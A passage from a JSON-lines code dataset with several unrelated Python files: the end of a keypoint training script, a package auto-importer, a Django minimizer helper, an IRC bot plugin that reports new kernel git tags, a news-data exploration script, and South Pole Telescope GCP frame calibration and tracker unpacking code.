{:0f}s\".format(time_elapsed // 60, time_elapsed % 60))\n print(\"Best val loss: {:.4f}\".format(best_loss))\n\n torch.save(best_model_wts, save_dir)\n return train_losses, valid_losses\n","sub_path":"train/keypoint_train.py","file_name":"keypoint_train.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"356279427","text":"'''\nCreated on Dec 9, 2015\nCopyright (c) 2015\nHarvard Informatics and Scientific Applications\nAll rights reserved.\n\n@author: Aaron Kitzmiller <aaron_kitzmiller@harvard.edu>\n'''\n\ndef getClassFromName(classname):\n '''\n Utility that will return the class object for a full qualified \n classname\n '''\n try:\n parts = classname.split('.')\n module = \".\".join(parts[:-1])\n m = __import__( module )\n for comp in parts[1:]:\n m = getattr(m, comp) \n return m\n except ImportError:\n return None \n\nclass UserException(Exception):\n '''\n I can actually get a message from this exception\n '''\n def __init__(self,message):\n super(UserException,self).__init__(message)\n self.user_msg = message \n \n \n__all__ = []\n\nimport pkgutil\nimport inspect\n\nfor loader, name, is_pkg in pkgutil.walk_packages(__path__):\n module = loader.find_module(name).load_module(name)\n\n for name, value in inspect.getmembers(module):\n if name.startswith('__'):\n continue\n\n globals()[name] = value\n __all__.append(name)\n","sub_path":"iggyflow/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"188334525","text":"import os\nfrom djangominimizer import settings\n\ndef get_minimizer_list(file_list, timestamp, ext):\n if not settings.MINIMIZER_DEBUG:\n file_min_list = []\n\n for file_orig in file_list:\n filename = os.path.splitext(file_orig)[0]\n file_min = '%s-%s.%s' % (filename, timestamp, ext)\n file_min_list.append(file_min)\n\n return file_min_list\n\n return file_list\n","sub_path":"djangominimizer/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"519521972","text":"# coding=utf-8\n# Copyright 2017 Matt Hart\n# Licensed under the Eiffel Forum License 2\n\nimport requests\nimport subprocess\nimport sys\n\nfrom sopel.config.types import StaticSection, ListAttribute\nfrom sopel.module import interval\nfrom sopel.logger import get_logger\n\nLOG = get_logger(__name__)\n\n\nclass GitTagSection(StaticSection):\n treelist = ListAttribute(\"treelist\")\n allowed_channels = ListAttribute(\"allowed_channels\")\n ignore_branches = ListAttribute(\"ignore_branches\")\n\n\ndef configure(config):\n config.define_section(\"git_tag\", GitTagSection)\n config.git_tag.configure_setting(\n \"treelist\",\n \"Enter your list of trees to monitor ([stable#linux-4.18.y, mainline#master])\",\n )\n\n\ndef setup(bot):\n bot.config.define_section(\"git_tag\", GitTagSection)\n if not bot.config.git_tag.treelist:\n return\n\n\ndef bot_say(bot, text):\n text = \"[GIT] {}\".format(text)\n LOG.info(text)\n for channel in bot.channels:\n if channel in bot.config.git_tag.allowed_channels:\n bot.say(text, channel)\n\n\ndef get_git_tag(text):\n for line in text:\n if line.startswith(\"VERSION\"):\n version = line.split(\"=\")[1].strip()\n if line.startswith(\"PATCHLEVEL\"):\n patchlevel = line.split(\"=\")[1].strip()\n if line.startswith(\"SUBLEVEL\"):\n sublevel = line.split(\"=\")[1].strip()\n if line.startswith(\"EXTRAVERSION\"):\n extraversion = line.split(\"=\")[1].strip()\n return \"v{}.{}.{}{}\".format(version, patchlevel, sublevel, extraversion)\n\n\ndef update_url(bot, url):\n LOG.info(\"Updating for %s\" % url)\n ls_data = subprocess.check_output([\"git\", \"ls-remote\", url, \"refs/heads/*\"])\n ls_data = ls_data.decode(\"utf-8\")\n ls_data = ls_data.strip()\n\n for tree in bot.config.git_tag.treelist:\n t_name, t_url = tree.split(\"#\")\n if url == t_url:\n name = t_name\n break\n\n for head_data in ls_data.split(\"\\n\"):\n head_data = head_data.split(\"\\t\")\n commit = head_data[0]\n branch = head_data[1]\n branch = branch.replace(\"refs/heads/\", \"\")\n treebranch = \"{}#{}\".format(name, branch)\n\n if treebranch in bot.config.git_tag.ignore_branches:\n continue\n\n makefile_url = get_makefile_url(url, commit)\n\n http = requests.get(makefile_url)\n if http.status_code == 302 or http.status_code == 404:\n continue\n toplines = http.content.decode(\"utf-8\").split(\"\\n\")\n git_tag = get_git_tag(toplines[:6])\n git_describe = \"{} ({})\".format(git_tag, commit)\n if treebranch in bot.memory[\"git_tag\"]:\n if bot.memory[\"git_tag\"][treebranch] != git_describe:\n bot_say(bot, \"{} has new version {}\".format(treebranch, git_describe))\n bot.memory[\"git_tag\"][treebranch] = git_describe\n else:\n LOG.info(\n \"{} has not changed tag from {}\".format(treebranch, git_describe)\n )\n else:\n LOG.info(\n \"no tag record for {}, setting to {}\".format(treebranch, git_describe)\n )\n bot.memory[\"git_tag\"][treebranch] = git_describe\n\n\ndef get_makefile_url(url, commit):\n if \"github.com\" in url:\n github_user, github_project = url.split(\"/\")[3:5]\n makefile_url = \"https://raw.githubusercontent.com/{}/{}/{}/Makefile\".format(\n github_user, github_project, commit\n )\n else:\n makefile_url = \"{}/plain/Makefile?h={}\".format(url, commit)\n\n return makefile_url\n\n\n@interval(120)\ndef xmlrpc_update(bot):\n if \"git_tag\" not in bot.memory:\n bot.memory[\"git_tag\"] = {}\n if \"manifest_fingerprints\" not in bot.memory:\n bot.memory[\"manifest_fingerprints\"] = {}\n\n # Fetch new manifest from git.kernel.org\n manifest_ret = None\n try:\n LOG.info(\"Fetching kernel.org manifest\")\n manifest_ret = subprocess.call(\n [\n \"/usr/bin/wget\",\n \"-qN\",\n \"-P\",\n \"/tmp\",\n \"https://git.kernel.org/manifest.js.gz\",\n ]\n )\n except (FileNotFoundError, CalledProcessError) as e:\n LOG.info(\"Error calling on wget. Can't get manifest.js.gz.\")\n\n # Get the fingerprint for\n for tree in bot.config.git_tag.treelist:\n name, url = tree.split(\"#\")\n if \"https://git.kernel.org/\" in url:\n # Did we fetch the manifest?\n if manifest_ret != 0:\n LOG.info(\"Manifest ret != 0\")\n continue\n key = url.replace(\"https://git.kernel.org\", \"\")\n cmd = \"\"\"zcat /tmp/manifest.js.gz | jq -r '{\"%s\"}[] | .fingerprint'\"\"\" % key\n fingerprint = subprocess.check_output(cmd, shell=True).decode().strip()\n LOG.info(\"Fingerprint for %s [%s]\" % (name, fingerprint))\n if url in bot.memory[\"manifest_fingerprints\"]:\n LOG.info(\n \"Fingerprints in memory for %s: %d\"\n % (name, len(bot.memory[\"manifest_fingerprints\"]))\n )\n if bot.memory[\"manifest_fingerprints\"][url] != fingerprint:\n LOG.info(\n \"Fingerprint changed for %s: %s (was %s)\"\n % (url, fingerprint, bot.memory[\"manifest_fingerprints\"][url])\n )\n update_url(bot, url)\n bot.memory[\"manifest_fingerprints\"][url] = fingerprint\n else:\n LOG.info(\"New fingerprint for %s: %s\" % (url, fingerprint))\n bot.memory[\"manifest_fingerprints\"][url] = fingerprint\n update_url(bot, url)\n else:\n LOG.info(\"Looking at non-git.kernel.org tree\")\n update_url(bot, url)\n","sub_path":"git_tag.py","file_name":"git_tag.py","file_ext":"py","file_size_in_byte":5806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"453203402","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import, division, print_function\nimport json\nimport pandas as pd\nfrom collections import defaultdict\n\n__author__ = \"Tozammel Hossain\"\n__email__ = \"tozammel@isi.edu\"\n\n\ndef show_an_instance(instance):\n # print(\"Type =\", type(instance))\n # print(\"Features =\\n\", instance.keys())\n # 'eventType', 'id', 'protest' (T/F: class var), 'link',\n # 'location' (list), 'words' (list),\n # 'date', 'doc2vec' (list), 'population'\n # print(type(instance['doc2vec']))\n\n print(\"Features:\")\n print('protest =', instance['protest'])\n print('eventType =', instance['eventType'])\n print('id =', instance['id'])\n print('date =', instance['date'])\n print('link =', instance['link'])\n print('population =', instance['population'])\n print('location =', instance['location'])\n print(len(instance['words']))\n print(len(instance['doc2vec']))\n print(\"\")\n\n\ndef explore_sample_data(filepath):\n from collections import defaultdict\n\n with open(filepath) as fp:\n lines = fp.read().splitlines()\n print(\"#lines =\", len(lines))\n\n countries = defaultdict(int)\n class_var = defaultdict(int)\n dates = list()\n\n for line in lines:\n line = line.strip()\n # print(line)\n instance = json.loads(line)\n country = instance['location'][0]\n countries[country] += 1\n # show_an_instance(instance)\n y = instance['protest']\n class_var[y] += 1\n dates.append(pd.to_datetime(instance['time']).date())\n\n print(countries)\n print(sum(countries.values()))\n print(class_var)\n print(sum(class_var.values()))\n\n\ndef read_lines_as_json(filepath):\n json_list = list()\n with open(filepath) as fp:\n lines = fp.read().splitlines()\n for line in lines:\n line = line.strip()\n # print(line)\n instance = json.loads(line)\n json_list.append(instance)\n return json_list\n\n\ndef create_daily_bags():\n print(\"Creating daily bags...\")\n\n filepath = \"sample-data/news_doc2vec_ar.json\"\n json_list = read_lines_as_json(filepath)\n daily_bags = defaultdict(list)\n\n for json_obj in json_list:\n # print(json_obj['date'])\n date = pd.to_datetime(json_obj['date']).date()\n daily_bags[date].append(json_obj)\n\n print(daily_bags.keys())\n daily_bags_size = {key: len([key]) for key in daily_bags.keys()}\n ts_bags = pd.Series(daily_bags_size)\n print(\"Start date =\", ts_bags.index.min())\n print(\"End date =\", ts_bags.index.max())\n print(\"Min num docs per day =\", ts_bags.min())\n print(\"Max num docs per day =\", ts_bags.max())\n print(ts_bags.head())\n print(ts_bags.tail())\n\n\ndef analyze_sample_traindata():\n # sample training instance\n filepath = \"sample-data/nMIL_lt4_ar/top6cities_realtime_TrainData_2weekshistory.json\"\n json_list = read_lines_as_json(filepath)\n print(\"#entries =\", len(json_list))\n\n pos = 0\n neg = 0\n dates = list()\n for json_obj in json_list:\n # print(json_obj.keys())\n # print(json_obj['time'])\n dates.append(json_obj['time'])\n if json_obj['protest']:\n pos += 1\n print(\"\\tpos, #keys =\", json_obj.keys())\n # print(\"\\tevent type =\", json_obj['eventType'])\n # print(\"\\tpopulation =\", json_obj['population'])\n else:\n neg += 1\n print(\"neg, #keys =\", json_obj.keys())\n\n print(\"#pos =\", pos)\n print(\"#neg =\", neg)\n\n df = pd.DataFrame(dates, columns=['date'])\n ts = df.groupby('date').size()\n print(\"Start date =\", ts.index.min(), \"End date =\", ts.index.max())\n print(\"Min val =\", ts.min(), \"Max val =\", ts.max())\n\n\ndef analyze_sample_news_doc2vec():\n # doc2vec representation\n filepath = \"sample-data/news_doc2vec_ar.json\"\n json_list = read_lines_as_json(filepath)\n\n pos = 0\n neg = 0\n for json_obj in json_list[0:10]:\n print(json_obj.keys())\n if json_obj['protest']:\n pos += 1\n print(\"\\tpos, #keys =\", json_obj.keys())\n print(\"\\tevent type =\", json_obj['eventType'])\n print(\"\\tpopulation =\", json_obj['population'])\n else:\n neg += 1\n print(\"neg, #keys =\", json_obj.keys())\n\n print(\"#pos =\", pos)\n print(\"#neg =\", neg)\n\n\ndef main(argv):\n analyze_sample_traindata()\n # analyze_sample_news_doc2vec()\n # create_daily_bags()\n\n\ndef main2(argv):\n filepath = \"sample-data/news_doc2vec_ar.json\"\n \"\"\"\n #rows = 10,384\n countries = {'Argentina': 10384}\n process_happened = {False: 9465, True: 919}\n \"\"\"\n\n from collections import defaultdict\n countries = defaultdict(int)\n class_var = defaultdict(int)\n dates = list()\n\n with open(filepath) as fp:\n lines = fp.read().splitlines()\n print(\"#lines =\", len(lines))\n\n for line in lines:\n line = line.strip()\n # print(line)\n instance = json.loads(line)\n country = instance['location'][0]\n countries[country] += 1\n # show_an_instance(instance)\n y = instance['protest']\n class_var[y] += 1\n dates.append(pd.to_datetime(instance['date']).date())\n\n print(countries)\n print(sum(countries.values()))\n print(class_var)\n print(sum(class_var.values()))\n\n print(type(dates[0]))\n df = pd.DataFrame(dates, columns=[\"date\"])\n ts = df.groupby(\"date\").size()\n\n print(ts.index.min())\n print(ts.index.max())\n print(ts.min())\n print(ts.max())\n\n\nif __name__ == \"__main__\":\n import sys\n\n sys.exit(main(sys.argv))\n","sub_path":"sample_data.py","file_name":"sample_data.py","file_ext":"py","file_size_in_byte":5724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"640242127","text":"import numpy, copy\nfrom spt3g import core\nfrom spt3g.gcp import ACUStatus, ACUState, TrackerStatus, TrackerState, TrackerPointing, CalFile\n\n@core.indexmod\ndef UnitValue(caldict_entry):\n '''Turn unit name into floating point unit value'''\n\n try: \n uname = caldict_entry['UnitName']\n if uname and uname != 'None':\n try:\n if '/' in uname:\n unames = list(filter(None,uname.split('/')))\n uvalue1 = getattr(core.G3Units, \n list(filter(None,unames[0].split(' ')))[0])\n uvalue2 = getattr(core.G3Units, \n list(filter(None,unames[1].split(' ')))[0])\n uvalue = uvalue1 / uvalue2\n else:\n uvalue = getattr(core.G3Units, uname)\n except AttributeError:\n uvalue = 1.\n core.log_warn('No entry in G3Units for ' + uname + '. Setting UnitValue to 1.0\\n')\n else:\n uvalue = 1.\n except KeyError:\n uvalue = 1.\n\n return uvalue\n\n\n@core.indexmod\ndef CalibrateFrame(f, calibration_file=None):\n '''Apply gain / offset / units from G3 cal file'''\n \n if f.type != core.G3FrameType.GcpSlow:\n return\n\n try:\n if f['Calibrated'] == True:\n print('Already calibrated!\\n')\n return\n except KeyError:\n f['Calibrated'] = True\n\n cf = CalFile.CalFileReader()\n cd = cf.readCalFile(calibration_file)\n\n for board in f.keys():\n if board == 'Calibrated':\n continue\n cboard = copy.deepcopy(f[board])\n for rmap in cboard.keys():\n for reg in cboard[rmap].keys():\n try: \n rcd = cd[board][rmap][reg]\n except KeyError:\n continue\n rsize = numpy.size(cboard[rmap][reg])\n if rsize > 1:\n rshape = numpy.shape(cboard[rmap][reg])\n if len(rshape) > 1:\n for i in range(rshape[0]):\n try:\n rcdi = rcd[i]\n except KeyError:\n rcdi = rcd\n uvalue = UnitValue(rcdi)\n datatemp = numpy.asarray(cboard[rmap][reg][i])\n datatemp2 = datatemp.copy()\n # if a register has units, it can't be an\n # int anymore.\n # well, actually, it can't be an int if\n # we're adding floats to it or multiplying\n # it by floats either, so convert\n # everything that has an entry in the cal\n # file to float/double.\n datatemp2 = numpy.asarray(datatemp2,dtype='float64')\n thisdtype = datatemp2.dtype\n datatemp2 += \\\n numpy.array(rcdi['Offset'],dtype=thisdtype)\n datatemp2 *= numpy.array(uvalue / \n rcdi['ReciprocalFactor'],\n dtype=thisdtype)\n if type(cboard[rmap][reg][i]) \\\n is core.G3VectorInt:\n regitemp = core.G3VectorDouble(datatemp2)\n elif type(cboard[rmap][reg][i]) \\\n is core.G3MapInt:\n regitemp = core.G3MapDouble(datatemp2)\n elif type(cboard[rmap][reg][i]) \\\n is core.G3Int:\n regitemp = core.G3Double(datatemp2)\n else:\n regitemp = \\\n (type(cboard[rmap][reg][i]))(datatemp2)\n cboard[rmap][reg][i] = regitemp\n else:\n try:\n rcdi = rcd[0]\n except KeyError:\n rcdi = rcd\n uvalue = UnitValue(rcdi)\n datatemp = numpy.asarray(cboard[rmap][reg])\n datatemp2 = datatemp.copy()\n # if a register has units, it can't be an\n # int anymore. well, actually (see above)...\n datatemp2 = numpy.asarray(datatemp2,dtype='float64')\n thisdtype = datatemp2.dtype\n datatemp2 += \\\n numpy.array(rcdi['Offset'],dtype=thisdtype)\n datatemp2 *= numpy.array(uvalue / rcdi['ReciprocalFactor'],dtype=thisdtype)\n if type(cboard[rmap][reg]) \\\n is core.G3VectorInt:\n regtemp = core.G3VectorDouble(datatemp2)\n elif type(cboard[rmap][reg]) \\\n is core.G3MapInt:\n regtemp = core.G3MapDouble(datatemp2)\n elif type(cboard[rmap][reg]) \\\n is core.G3Int:\n regtemp = core.G3Double(datatemp2)\n else:\n regtemp = \\\n (type(cboard[rmap][reg]))(datatemp2)\n cboard[rmap][reg] = regtemp\n else:\n try:\n rcdi = rcd[0]\n except KeyError:\n rcdi = rcd\n uvalue = UnitValue(rcdi)\n datatemp = cboard[rmap][reg].value\n datatemp2 = datatemp\n # if a register has units, it can't be an\n # int anymore. well, actually (see above)...\n datatemp2 = numpy.float(datatemp2)\n datatemp2 = datatemp2 + rcdi['Offset']\n datatemp2 *= uvalue / rcdi['ReciprocalFactor']\n if type(cboard[rmap][reg]) \\\n is core.G3VectorInt:\n regtemp = core.G3VectorDouble(datatemp2)\n elif type(cboard[rmap][reg]) \\\n is core.G3MapInt:\n regtemp = core.G3MapDouble(datatemp2)\n elif type(cboard[rmap][reg]) \\\n is core.G3Int:\n regtemp = core.G3Double(datatemp2)\n else:\n regtemp = \\\n (type(cboard[rmap][reg]))(datatemp2)\n cboard[rmap][reg] = regtemp\n del f[board]\n f[board] = cboard\n\n@core.indexmod\ndef UnpackACUData(f):\n '''Extracts ACU status information to ACUStatus key in frame'''\n\n if f.type != core.G3FrameType.GcpSlow:\n return\n\n a = ACUStatus()\n a.time = f['antenna0']['frame']['utc']\n a.az_pos = f['antenna0']['acu']['az_pos'].value\n a.el_pos = f['antenna0']['acu']['el_pos'].value\n a.az_rate = f['antenna0']['acu']['az_rate'].value\n a.el_rate = f['antenna0']['acu']['el_rate'].value\n\n # 'new_*' registers not actually filled by GCP; ignore them\n\n a.px_checksum_error_count = f['antenna0']['acu']['px_checksum_error_count'].value\n a.px_resync_count = f['antenna0']['acu']['px_resync_count'].value\n a.px_resync_timeout_count = f['antenna0']['acu']['px_resync_timeout_count'].value\n a.px_resyncing = f['antenna0']['acu']['px_resyncing'].value\n a.px_timeout_count = f['antenna0']['acu']['px_timeout_count'].value\n a.restart_count = f['antenna0']['acu']['restart_count'].value\n\n a.state = ACUState(f['antenna0']['acu']['state'].value)\n a.status = f['antenna0']['acu']['acu_status'].value\n try:\n a.error = f['antenna0']['acu']['acu_error'].value\n except KeyError:\n # This register was some time in early 2018. In order to read\n # older data, just set the error code to 0.\n a.error = 0\n\n f['ACUStatus'] = a\n\n@core.indexmod\ndef UnpackTrackerMinimal(f, rewrite_source_from_feature_bits=True):\n '''\n Construct SourceName and ObservationId keys from frame.\n\n If rewrite_source_from_feature_bits is True (the default), will try to\n rewrite source names if DecryptFeatureBit() has been run and either\n \"elnod\", \"calibrator\", or \"noise\" is present in the feature bit list\n to that value.\n '''\n\n if f.type != core.G3FrameType.GcpSlow:\n return\n\n # Grab the GCP source name. If it is \"current\", fill in something more\n # helpful from the feature bits if possible.\n source = f['antenna0']['tracker']['source'].value\n if rewrite_source_from_feature_bits and 'GCPFeatureBits' in f:\n if 'elnod' in f['GCPFeatureBits']:\n source = 'elnod'\n if 'calibrator' in f['GCPFeatureBits']:\n source = 'calibrator'\n if 'noise' in f['GCPFeatureBits']:\n source = 'noise'\n if 'debug' in f['GCPFeatureBits']:\n source = 'debug-forced-scanify'\n if 'every_pixel_on_src' in f['GCPFeatureBits']:\n source = source + '-pixelraster' # NB: Do NOT use in-place +=\n f['SourceName'] = source\n\n # And observation ID, if present\n if 'obs_id' in f['antenna0']['tracker']:\n f['ObservationID'] = f['antenna0']['tracker']['obs_id']\n\n@core.indexmod\ndef UnpackTrackerData(f, rewrite_source_from_feature_bits=True):\n '''\n Extracts tracker status information to frame into the TrackerStatus key,\n along with the observation processing handled by UnpackTrackerMinimal.\n\n If rewrite_source_from_feature_bits is True (the default), will try to\n rewrite source names if DecryptFeatureBit() has been run and either\n \"elnod\", \"calibrator\", or \"noise\" is present in the feature bit list\n to that value.\n '''\n\n if f.type != core.G3FrameType.GcpSlow:\n return\n\n UnpackTrackerMinimal(f, rewrite_source_from_feature_bits)\n\n t = TrackerStatus()\n # List comprehensions are due to funny business with G3VectorFrameObject\n t.time = [tm for tm in f['antenna0']['tracker']['utc'][0]]\n\n # Measured values\n t.az_pos = numpy.asarray(f['antenna0']['tracker']['actual'][0])\n t.el_pos = numpy.asarray(f['antenna0']['tracker']['actual'][1])\n # XXX units for rates seem to be wrong. I think this is in encoder counts\n t.az_rate = numpy.asarray(f['antenna0']['tracker']['actual_rates'][0],\n dtype = float)\n t.el_rate = numpy.asarray(f['antenna0']['tracker']['actual_rates'][1],\n dtype = float)\n \n # Expected values\n t.az_command = numpy.asarray(f['antenna0']['tracker']['expected'][0])\n t.el_command = numpy.asarray(f['antenna0']['tracker']['expected'][1])\n t.az_rate_command = numpy.asarray(f['antenna0']['tracker']['expected_rates'][0], dtype = float)\n t.el_rate_command = numpy.asarray(f['antenna0']['tracker']['expected_rates'][1], dtype = float)\n\n # Status params\n if isinstance(f['antenna0']['tracker']['state'][0], core.G3String):\n # If state is all zero (LACKING), for example due to an ACU glitch,\n # the ARC reader may decide that the 8-bit array field is a string.\n # Treat it as one.\n t.state = [TrackerState(0) for s in f['antenna0']['tracker']['inControl'][0]]\n else:\n t.state = [TrackerState(s) for s in f['antenna0']['tracker']['state'][0]]\n t.acu_seq = f['antenna0']['tracker']['acu_seq'][0]\n t.in_control = core.BoolVector(f['antenna0']['tracker']['inControl'][0])\n t.in_control_int = core.IntVector(f['antenna0']['tracker']['inControl'][0])\n t.scan_flag = core.BoolVector(f['antenna0']['tracker']['scan_flag'][0])\n \n t.lst = numpy.asarray(f['antenna0']['tracker']['lst'][0], dtype=float)\n\n t.source_acquired = numpy.asarray(f['antenna0']['tracker']['off_source'][0])\n t.source_acquired_threshold = numpy.asarray(f['antenna0']['tracker']['source_acquired_threshold'])\n t.tracker_mode = numpy.asarray(f['antenna0']['tracker']['mode'][0])\n t.tracker_lacking = numpy.asarray(f['antenna0']['tracker']['lacking'][0])\n t.time_status = numpy.asarray(f['antenna0']['tracker']['time_status'][0])\n try:\n t.schedule_name = numpy.asarray(f['antenna0']['tracker']['schedule_name'].value)\n except AttributeError:\n t.schedule_name = numpy.asarray(''.join([chr(x) for x in f['antenna0']['tracker']['schedule_name']]))\n\n f['TrackerStatus'] = t\n\n\n@core.indexmod\ndef UnpackTrackerPointingData(f):\n '''\n Extracts tracker registers relevant to online and offline pointing.\n Calibration values (offsets and multiplicative constants) are from\n gcp/control/conf/spt/cal.\n '''\n\n if f.type != core.G3FrameType.GcpSlow:\n return\n\n t = TrackerPointing()\n t.time = [tm for tm in f['antenna0']['tracker']['utc'][0]]\n t.scu_temp = numpy.asarray(f['antenna0']['scu']['temp'])\n t.features = core.IntVector([f['array']['frame']['features'].value])\n\n t.encoder_off_x = numpy.asarray([f['antenna0']['tracker']['encoder_off'][0]], dtype=numpy.double)\n t.encoder_off_y = numpy.asarray([f['antenna0']['tracker']['encoder_off'][1]], dtype=numpy.double)\n \n t.low_limit_az = numpy.asarray([f['antenna0']['tracker']['az_limits'][0]], dtype=numpy.double)\n t.high_limit_az = numpy.asarray([f['antenna0']['tracker']['az_limits'][1]], dtype=numpy.double)\n t.low_limit_el = numpy.asarray([f['antenna0']['tracker']['el_limits'][0]], dtype=numpy.double)\n t.high_limit_el = numpy.asarray([f['antenna0']['tracker']['el_limits'][1]], dtype=numpy.double)\n\n t.tilts_x = numpy.asarray(f['antenna0']['tracker']['tilt_xy_avg'][0], dtype=numpy.double)\n t.tilts_y = numpy.asarray(f['antenna0']['tracker']['tilt_xy_avg'][1], dtype=numpy.double)\n t.refraction = numpy.asarray(f['antenna0']['tracker']['refraction'][2], dtype=numpy.double)\n\n t.horiz_mount_x = numpy.asarray(f['antenna0']['tracker']['horiz_mount'][0])\n t.horiz_mount_y = numpy.asarray(f['antenna0']['tracker']['horiz_mount'][1])\n t.horiz_off_x = numpy.asarray(f['antenna0']['tracker']['horiz_off'][0])\n t.horiz_off_y = numpy.asarray(f['antenna0']['tracker']['horiz_off'][1])\n\n t.scan_off_x = numpy.asarray(f['antenna0']['tracker']['scan_off'][0])\n t.scan_off_y = numpy.asarray(f['antenna0']['tracker']['scan_off'][1])\n t.sky_off_x = numpy.asarray(f['antenna0']['tracker']['sky_xy_off'][0])\n t.sky_off_y = numpy.asarray(f['antenna0']['tracker']['sky_xy_off'][1])\n t.equat_off_x = numpy.asarray(f['antenna0']['tracker']['equat_off'][0])\n t.equat_off_y = numpy.asarray(f['antenna0']['tracker']['equat_off'][1])\n\n t.equat_geoc_ra = numpy.asarray(f['antenna0']['tracker']['equat_geoc'][0])\n t.equat_geoc_dec = numpy.asarray(f['antenna0']['tracker']['equat_geoc'][1])\n t.horiz_topo_az = numpy.asarray(f['antenna0']['tracker']['horiz_topo'][0])\n t.horiz_topo_el = numpy.asarray(f['antenna0']['tracker']['horiz_topo'][1])\n\n t.error_az = numpy.asarray(f['antenna0']['tracker']['errors'][0])\n t.error_el = numpy.asarray(f['antenna0']['tracker']['errors'][1])\n\n t.linsens_avg_l1 = numpy.asarray(f['antenna0']['tracker']['linear_sensor_avg'][0])\n t.linsens_avg_l2 = numpy.asarray(f['antenna0']['tracker']['linear_sensor_avg'][1])\n t.linsens_avg_r1 = numpy.asarray(f['antenna0']['tracker']['linear_sensor_avg'][2])\n t.linsens_avg_r2 = numpy.asarray(f['antenna0']['tracker']['linear_sensor_avg'][3])\n \n t.telescope_temp = numpy.asarray([f['array']['weather']['airTemperature'].value])\n t.telescope_pressure = numpy.asarray([f['array']['weather']['pressure'].value])\n\n f['TrackerPointing'] = t\n\n p = core.G3MapVectorDouble()\n p['tilts'] = numpy.asarray(f['antenna0']['tracker']['tilts'], dtype=numpy.double)\n p['flexure'] = numpy.asarray(f['antenna0']['tracker']['flexure'], dtype=numpy.double)\n p['fixedCollimation'] = numpy.asarray(f['antenna0']['tracker']['fixedCollimation'], dtype=numpy.double)\n p['time'] = numpy.asarray(t.time, dtype=numpy.double)\n\n f['OnlinePointingModel'] = p\n\n@core.indexmod\ndef DecryptFeatureBit(f):\n '''\n Unpacks the GCP feature flags\n '''\n\n if f.type != core.G3FrameType.GcpSlow:\n return\n\n flag_array = core.G3VectorString()\n feature_bit = f['array']['frame']['features'].value\n\n flags = ['analyze', 'source_scan', 'cabin_shutter', 'elnod', 'pol_cal',\n 'calibrator', 'every_pixel_on_src', 'skydip', 'optical', 'noise',\n 'trail', 'el_scan', None, None, None, None, None, None, None,\n 'debug']\n # Sorry... NDH\n\n for i in enumerate(flags):\n if feature_bit & (1 << i[0]):\n if i[1] is None:\n core.log_error('Got an unused feature bit: {:d}'.format(i[0]))\n flag_array.append(i[1])\n\n f['GCPFeatureBits'] = flag_array\n\n@core.indexmod\ndef AddBenchData(f):\n '''\n Add the optical bench positions to the frame.\n '''\n if f.type != core.G3FrameType.GcpSlow:\n return\n bench_axes = ['y1', 'y2', 'y3', 'x4', 'x5', 'z6']\n\n benchcom = core.G3TimestreamMap()\n benchpos = core.G3TimestreamMap()\n benchzero = core.G3TimestreamMap()\n benchoff = core.G3TimestreamMap()\n bencherr = core.G3TimestreamMap()\n bench_info = core.G3TimestreamMap()\n for i, key in enumerate(bench_axes):\n # As of 2017-08-03, SCU time is not trustworthy\n # start = f['antenna0']['scu']['benchSampleTime'][0][0]\n # stop = f['antenna0']['scu']['benchSampleTime'][0][-1]\n # For now, do this bit of evil\n start = f['antenna0']['tracker']['utc'][0][0]\n stop = f['antenna0']['tracker']['utc'][0][-1]\n\n benchcom[key] = core.G3Timestream(f['antenna0']['scu']['benchExpected'][i])\n benchcom[key].start = start\n benchcom[key].stop = stop\n\n benchpos[key] = core.G3Timestream(f['antenna0']['scu']['benchActual'][i])\n benchpos[key].start = start\n benchpos[key].stop = stop\n\n benchzero[key] = core.G3Timestream(f['antenna0']['scu']['benchZeros'][i])\n benchzero[key].start = start\n benchzero[key].stop = stop\n\n benchoff[key] = core.G3Timestream(f['antenna0']['scu']['benchOffsets'][i])\n benchoff[key].start = start\n benchoff[key].stop = stop\n\n bencherr[key] = core.G3Timestream(f['antenna0']['scu']['benchErrors'][i])\n bencherr[key].start = start\n bencherr[key].stop = stop\n\n info_items = ['benchFocus', 'benchDeadBand', 'benchAcquiredThreshold',\n 'benchPrimaryState', 'benchSecondaryState', \n 'benchFault', 'timeLocked']\n bench_info = core.G3TimestreamMap()\n for i, key in enumerate(info_items):\n start = f['antenna0']['tracker']['utc'][0][0]\n stop = f['antenna0']['tracker']['utc'][0][-1]\n\n bench_info[key] = core.G3Timestream(f['antenna0']['scu'][key][0])\n bench_info[key].start = start\n bench_info[key].stop = stop\n\n f['BenchPosition'] = benchpos\n f['BenchCommandedPosition'] = benchcom\n f['BenchZeros'] = benchzero\n f['BenchOffsets'] = benchoff\n f['BenchErrors'] = bencherr\n f['BenchInfo'] = bench_info\n f['BenchSampleTime'] = f['antenna0']['scu']['benchSampleTime'][0]\n \n@core.indexmod\ndef UnpackCryoData(f):\n '''\n Extracts cryo information into CryoStatus key\n '''\n\n if f.type != core.G3FrameType.GcpSlow:\n return\n\n if 'cryo' not in f['array']:\n return\n\n t = core.G3MapDouble()\n t.time = f['array']['cryo']['utc']\n t.cryo_is_valid = f['array']['cryo']['cryoIsValid'][0]\n\n # Measured values\n # He10\n t.uc_head = f['array']['cryo']['temperature'][0][0]\n t.ic_head = f['array']['cryo']['temperature'][0][1]\n t.he4_head = f['array']['cryo']['temperature'][0][2]\n t.he4_fb = f['array']['cryo']['temperature'][0][3]\n t.he4_pump = f['array']['cryo']['temperature'][0][4]\n t.ic_pump = f['array']['cryo']['temperature'][0][5]\n t.uc_pump = f['array']['cryo']['temperature'][0][6]\n t.he4_sw = f['array']['cryo']['temperature'][0][7]\n t.ic_sw = f['array']['cryo']['temperature'][0][8]\n t.uc_sw = f['array']['cryo']['temperature'][0][9]\n t.uc_stage = f['array']['cryo']['temperature'][0][10]\n t.lc_tower = f['array']['cryo']['temperature'][0][11]\n t.ic_stage = f['array']['cryo']['temperature'][0][12]\n t.t4k_head = f['array']['cryo']['temperature'][0][13]\n 